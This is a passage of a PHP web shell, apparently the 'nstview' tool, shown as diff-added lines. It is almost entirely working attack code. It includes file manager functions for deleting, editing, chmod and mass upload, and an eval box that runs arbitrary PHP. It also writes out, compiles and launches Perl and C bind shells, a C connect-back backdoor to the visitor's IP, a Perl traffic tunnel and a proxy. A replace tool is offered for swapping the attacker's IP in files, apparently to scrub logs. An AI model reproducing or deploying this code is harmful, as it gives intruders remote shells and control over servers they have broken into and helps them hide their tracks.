type="text" name="sym_group" value="" size="3"></td> + <td align="center"><input type="text" name="sym_other" value="" size="3"></td> + <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td> + </tr> +</table></td></tr></table></p> +HTML; + +print "<center>".$chmd." + +<b>$d/$wich_f</b><br><br> +<input type=submit value=CHMOD></form> +</center> +</form> +"; +$t_total=$_POST['t_total']; +if($t_total){ +chmod($d."/".$wich_f,$t_total); +print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>"; +print "<a href='$php_self?d=$d'># BACK</a><br><br>"; +} +echo $copyr; +exit; +} + +# rename +if(@$_GET['rename']){ +print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br> +<center> +<form method=post> +<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br> +<input name=rto size=40 value='$wich_f'><br><br> +<input type=submit value=RENAME> +</form> +"; + +@$rto=$_POST['rto']; + +if($rto){ +$fr1=$d."/".$wich_f; +$fr1=str_replace("//","/",$fr1); +$to1=$d."/".$rto; +$to1=str_replace("//","/",$to1); + +rename($fr1,$to1); +print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>"; + +echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">"; + +} + +echo $copyr; +exit; +} + + + + +if(@$_GET['deldir']){ +@$dir=$_GET['dir']; +function deldir($dir) +{ +$handle = @opendir($dir); +while (false!==($ff = @readdir($handle))){ +if($ff != "." 
&& $ff != ".."){ +if(@is_dir("$dir/$ff")){ +deldir("$dir/$ff"); +}else{ +@unlink("$dir/$ff"); +}}} +@closedir($handle); +if(@rmdir($dir)){ +@$success = true;} +return @$success; +} +$dir=@$dir; +deldir($dir); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">"; +echo $copyr; +exit;} + + +if(@$_GET['t']=="tools"){ + # unix +if($os=="unix"){ +print " +<center><br> +<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font> +<table border=1> +<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr> +<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr> +<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. 
ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr> +<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr> +<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr> +<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr> +<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr> +</table> +</center> +<br><Br> +"; +}#end of unix + + +if($_POST['perl_bd']){ +$port=$_POST['port']; +$perl_bd_scp = " +use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); +setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY)); +listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);} +open STDIN,\"<&X\";open 
STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\"); +close X;}}"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl /tmp/nst_perl_bd.pl &"); +unlink("/tmp/nst_perl_bd.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &"); +unlink(".nst_bd_tmp/nst_perl_bd.pl"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of start perl_bd + +if($_POST['perl_proxy']){ +$port=$_POST['port']; +$perl_proxy_scp = "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"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl /tmp/nst_perl_proxy.pl $port &"); +unlink("/tmp/nst_perl_proxy.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_proxy_tmp"); +$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &"); +unlink(".nst_proxy_tmp/nst_perl_proxy.pl"); +rmdir(".nst_proxy_tmp"); +} +} +$show_ps="1"; +}#end of start perl_proxy + +if($_POST['c_bd']){ +$port=$_POST['port']; +$c_bd_scp = "#define PORT $port +#include <stdio.h> +#include <signal.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netinet/in.h> + +int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; +struct sockaddr_in serv_addr; +struct sockaddr_in client_addr; + +int main () +{ + soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (soc_des == -1) + exit(-1); + bzero((char *) &serv_addr, sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); + serv_addr.sin_port = htons(PORT); + soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); + if (soc_rc != 0) + exit(-1); + if (fork() != 0) + exit(0); + setpgrp(); + signal(SIGHUP, SIG_IGN); + if (fork() != 
0) + exit(0); + soc_rc = listen(soc_des, 5); + if (soc_rc != 0) + exit(0); + while (1) { + soc_len = sizeof(client_addr); + soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); + if (soc_cli < 0) + exit(0); + cli_pid = getpid(); + server_pid = fork(); + if (server_pid != 0) { + dup2(soc_cli,0); + dup2(soc_cli,1); + dup2(soc_cli,2); + execl(\"/bin/sh\",\"sh\",(char *)0); + close(soc_cli); + exit(0); + } + close(soc_cli); + } +} + +"; + + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd"); +passthru("nohup /tmp/nst_bd &"); +unlink("/tmp/nst_c_bd.c"); +unlink("/tmp/nst_bd"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd"); +passthru("nohup .nst_bd_tmp/nst_bd &"); +unlink(".nst_bd_tmp/nst_bd"); +unlink(".nst_bd_tmp/nst_c_bd.c"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of c bd + + +if($_POST['bc_c']){ # nc -l -p 4500 +$port_c = $_POST['port_c']; +$ip=$_POST['ip']; +$bc_c_scp = "#include <stdio.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <unistd.h> +#include <fcntl.h> + +#include <netinet/in.h> +#include <netdb.h> + +int fd, sock; +int port = $port_c; +struct sockaddr_in addr; + +char mesg[] = \"::Connect-Back Backdoor:: CMD: \"; +char shell[] = \"/bin/sh\"; + +int main(int argc, char *argv[]) { + while(argc<2) { + fprintf(stderr, \" %s <ip> \", argv[0]); + exit(0); } + +addr.sin_family = AF_INET; +addr.sin_port = htons(port); +addr.sin_addr.s_addr = inet_addr(argv[1]); +fd = socket(AF_INET, SOCK_STREAM, 0); +connect(fd, (struct sockaddr*)&addr, sizeof(addr)); + +send(fd, mesg, sizeof(mesg), 0); + +dup2(fd, 0); +dup2(fd, 1); +dup2(fd, 2); +execl(shell, \"in.telnetd\", 0); + +close(fd); +return 1; +} + +"; + +if(is_writable("/tmp")){ +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");} 
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");} +$fp=fopen("/tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c"); +passthru("nohup /tmp/nst_bc_c $ip &"); +unlink("/tmp/nst_bc_c"); +unlink("/tmp/nst_bc_c.c"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bc_c_tmp"); +$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c"); +passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &"); +unlink(".nst_bc_c_tmp/nst_bc_c.c"); +unlink(".nst_bc_c_tmp/nst_bc_c"); +rmdir(".nst_bc_c_tmp"); +} +} +$show_ps="1"; + +}#end of back connect C + + +if($_POST['datapipe_pl']){ +$port_2=$_POST['port_2']; +$port_3=$_POST['port_3']; +$ip=$_POST['ip']; +$datapipe_pl = " +#!/usr/bin/perl +# coded by CuTTer (rus hacker) +use IO::Socket; +use POSIX; + +\$localport=$port_2; +\$host=\"$ip\"; +\$port=$port_3; + +\$daemon=1; + +\$DIR = undef; + +## آûâîنèٍü ëîم ٌîلûٍèé (1-نà, 0-يهٍ) +\$log=0; + + + + +\$| = 1; + +if (\$daemon){ + print \"3anycKaeM daemon\n\"; + + \$pid = fork; + exit if \$pid; + die \"Couldn't fork: \$!\" unless defined(\$pid); + POSIX::setsid() or die \"Can't start a new session: \$!\"; +} + +%o = ('port' => \$localport, + 'toport' => \$port, + 'tohost' => \$host); + +\$ah = IO::Socket::INET->new( + 'LocalPort' => \$localport, + 'Reuse' => 1, + 'Listen' => 10) + || die \"حهëüçے îٍêًûٍü ٌîêهٍ نëے ٌîهنèيهيèé: \$!\"; + +print \"حà÷èيàهى âûïîëيهيèے ِèêëà.\n\" if \$log; +\$SIG{'CHLD'} = 'IGNORE'; +\$num = 0; +while (1) { + \$ch = \$ah->accept(); + if (!\$ch) { + print STDERR \"دًهًâàيî âûïîëهيèه accept: \$!\n\"; + next; + } + + printf(\"حîâûé êëèهيٍ: host %s, port %s.\n\", + \$ch->peerhost(), \$ch->peerport()) if \$log; + ++\$num; + \$pid = fork(); + if (!defined(\$pid)) { + print STDERR \"حهâîçىîويî âûïîëيèٍü fork: \$!\n\"; + } elsif (\$pid == 0) { +## حîâûé 
ïًîِهٌٌ + \$ah->close(); + Run(\%o, \$ch, \$num); + } else { + print \"Parent: Fork ïًîّهë ٌَïهّيî, çàêًûâàهى ٌîêهٍ.\n\" if \$log; + \$ch->close(); + } +} + + +sub Run { + my(\$o, \$ch, \$num) = @_; + my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'}, + 'PeerPort' => \$o->{'toport'}); + print(\"Child: ؤهëàهى ًهنèًهêٍ يà \$o->{'tohost'}, ïîًٍ \$o->{'toport'}.\n\") if \$log; + if (!\$th) { + printf STDERR (\"Child: دًهًâàي ًهنèًهêٍ يà %s, ïîًٍ %s.\n\", + \$o->{'tohost'}, \$o->{'toport'}); + exit 0; + } + + my \$fh; + if (\$o->{'dir'}) { + \$fh = Symbol::gensym(); + open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\") + or die \"Child: دًهًâàيî ٌîçنàيèه ëîم ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\"; + } + + \$ch->autoflush(); + \$th->autoflush(); + while (\$ch || \$th) { + print \"Child: آêë‏÷àهى ِèêë.\n\" if \$log; + my \$rin = \"\"; + vec(\$rin, fileno(\$ch), 1) = 1 if \$ch; + vec(\$rin, fileno(\$th), 1) = 1 if \$th; + my(\$rout, \$eout); + select(\$rout = \$rin, undef, \$eout = \$rin, 120); + if (!\$rout && !\$eout) { + print STDERR \"Child: خّèلêà Timeout.\n\"; + } + my \$cbuffer = \"\"; + my \$tbuffer = \"\"; + + if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) { + print \"Child: ئنهى نàييûُ îٍ êëèهيٍà.\n\" if \$log; + my \$result = sysread(\$ch, \$tbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: خّèلêà ïًè ٌ÷èٍûâàيèè نàييûُ êëèهيٍà: \$!\n\"; + exit 0; + } + if (\$result == 0) { + print \"Child: تëèهيٍ îٌٍîهنèيèëٌے.\n\" if \$log; + exit 0; + } + + print \"Child: ؤàييûه: \$cbuffer\n\" if \$log; + } + + if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) { + print \"Child: ئنهى نàييûُ.\n\" if \$log; + my \$result = sysread(\$th, \$cbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: حهâîçىîويî ٌ÷èٍàٍü نàييûه: \$!\n\"; + exit 0; + } + + if (\$result == 0) { + print \"Child: دًîèçîّëî îٌٍîهنèيهيèه.\n\" if \$log; + exit 0; + } + + print \"Child: ؤàييûه: \$cbuffer\n\" if \$log; + 
} + + if (\$fh && \$tbuffer) { + (print \$fh \$tbuffer); + } + + while (my \$len = length(\$tbuffer)) { + print \"Child: خٍïًàâëےهى \$len لàéٍ.\n\" if \$log; + my \$res = syswrite(\$th, \$tbuffer, \$len); + print \"Child: ؤàييûه îٍïًàâëهيû.\n\" if \$log; + if (\$res > 0) { + \$tbuffer = substr(\$tbuffer, \$res); + } else { + print STDERR \"Child: حهâîçىîويî îٍïًàâèٍü نàييûه: \$!\n\"; + } + } + + while (my \$len = length(\$cbuffer)) { + print \"Child: خٍïًàâëےهى \$len لàéٍ êëèهيٍَ.\n\" if \$log; + my \$res = syswrite(\$ch, \$cbuffer, \$len); + print \"Child: ؤàييûه îٍïًàâëهيû..\n\" if \$log; + if (\$res > 0) { + \$cbuffer = substr(\$cbuffer, \$res); + } else { + print STDERR \"Child: حهâîçىîويî îٍïًàâèٍü نàييûه: \$!\n\"; + } + } + } +} + +"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl /tmp/nst_perl_datapipe.pl &"); +unlink("/tmp/nst_perl_datapipe.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_datapipe_tmp"); +$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &"); +unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl"); +rmdir(".nst_datapipe_tmp"); +} +} +$show_ps="1"; + +}#end of datapipe perl + + + + + +if($show_ps=="1"){ +print "<center><b>[ps ux]</b></center><br><br>"; +print "<pre>"; +passthru("ps ux"); +print "</pre><br><br>"; +} + + + +echo "<form method=post><b>md5:</b><br><input name=md5 size=30> +<Br> +md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>] +</form> +"; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";} +echo "<br> +<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>"; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br> +Decode:</b> 
<br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";} +echo "<br> +<form method=post><b>DES:</b><br><input name=des size=30><br> +John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>"; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";} + +print " +<b>eval:</b<br> +(example: print \"Hello World\";) +<form method=post> +<font color=red><b>&lt;?</b><br> +<textarea name=eval rows=15 cols=113></textarea><br> +<b>?&gt;</b></font><br> +<input type=submit value=Run style='width:150px;'> +</form><br> +"; + +function eval_sl($editf){ +if(get_magic_quotes_gpc()==1){ +$editf=stripslashes($editf); +} +return $editf; +} + + +if($_POST['eval']){ +print "<b>RESULT:<br><br></b>"; +eval(eval_sl($_POST['eval'])); +print "<br><br>"; + +print "<font color=green><b>PHP:</b><br>\r\n\r\n"; +print "&lt;?\r\n"; +print "<br>"; +print htmlspecialchars(eval_sl(($_POST['eval']))); +print "<br>"; +print "?&gt;\r\n\r\n</font><br><br>"; + +} + +echo $copyr; +exit;} + +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>"; +echo " +Replace tool:<br> +(You can replace any text)<br> +File: $de<br> +<form method=post> +1. Your ip.<br> +2. 
microsoft.com ip :)<br> +Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156> +<input type=submit name=doit value=Replace> +</form> +"; + +if(@$_POST['doit']){ +@$thisX=$_POST['thisX']; +@$bythis=$_POST['bythis']; +@$e=$_GET['e']; +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$thisX","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "<br><center>$thisX Replaced by $bythis<br> +[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>"; + +} +echo $copyr; +exit;} + + +if(@$_GET['t']=="upload"){ +echo "<br> +<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br> +File upload:<br> +<form enctype=\"multipart/form-data\" method=post> +<input type=file name=text size=50><br> +<input name=where size=52 value='$d'><br> +New file name:<br> +<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br> +<input type=submit value=Upload name=uploadf> +</form><br> +"; + +if(@$_POST['uploadf']){ +$where=$_POST['where']; +$newf=$_POST['newf']; +$where=str_replace("//","/",$where); +if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} +$uploadfile = "$where/".$newf; +if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { +$uploadfile=str_replace("//","/",$uploadfile); +echo "<i><br>Uploaded to $uploadfile</i><br>"; +}else{ +echo "<i><br>Error</i><br>";} +} +} + +if(@$_GET['t']=="massupload"){ +echo " +Mass upload:<br> +<form enctype=\"multipart/form-data\" method=post> +<input type=file name=text1 size=43> <input type=file name=text11 size=43><br> +<input type=file name=text2 size=43> <input type=file name=text12 size=43><br> +<input type=file name=text3 size=43> <input type=file name=text13 size=43><br> +<input type=file name=text4 size=43> <input type=file name=text14 size=43><br> +<input type=file name=text5 size=43> <input type=file name=text15 size=43><br> +<input type=file name=text6 
size=43> <input type=file name=text16 size=43><br> +<input type=file name=text7 size=43> <input type=file name=text17 size=43><br> +<input type=file name=text8 size=43> <input type=file name=text18 size=43><br> +<input type=file name=text9 size=43> <input type=file name=text19 size=43><br> +<input type=file name=text10 size=43> <input type=file name=text20 size=43><br> +<input name=where size=43 value='$d'><br> +<input type=submit value=Upload name=massupload> +</form><br>"; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile1</i><br>";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile2</i><br>";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], 
$uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile3</i><br>";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile4</i><br>";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile5</i><br>";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile6</i><br>";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile7</i><br>";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile8</i><br>";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile9</i><br>";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile10</i><br>";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile11</i><br>";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile12</i><br>";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile13</i><br>";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile14</i><br>";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); 
+echo "<i>Uploaded to $uploadfile15</i><br>";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile16</i><br>";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile17</i><br>";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile18</i><br>";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile19</i><br>";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile20</i><br>";} +} +echo $copyr; +exit;} + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">"; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">"; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">"; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}} +echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a 
href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>"; +echo " +File contents:<br> +$de +<br> +<table width=100% border=1 cellpadding=0 cellspacing=0> +<tr><td><pre> +$c + +</pre></td></tr> +</table> + +"; + +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +DELETE: Are you sure?<br> +<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a> +<br> +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\"> +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +$e=$ef; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}} +echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>"; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +Edit:<br> +$de<br>"; + +if(!@$_POST['save']){ +print " +<form method=post> +<input name=filename value='$d/$ef'> +<textarea cols=143 rows=30 name=editf>$c</textarea> +<br> +<input type=submit name=save value='Save changes'></form><br> +"; +} +if(@$_POST['save']){ +$editf=@$_POST['editf']; + 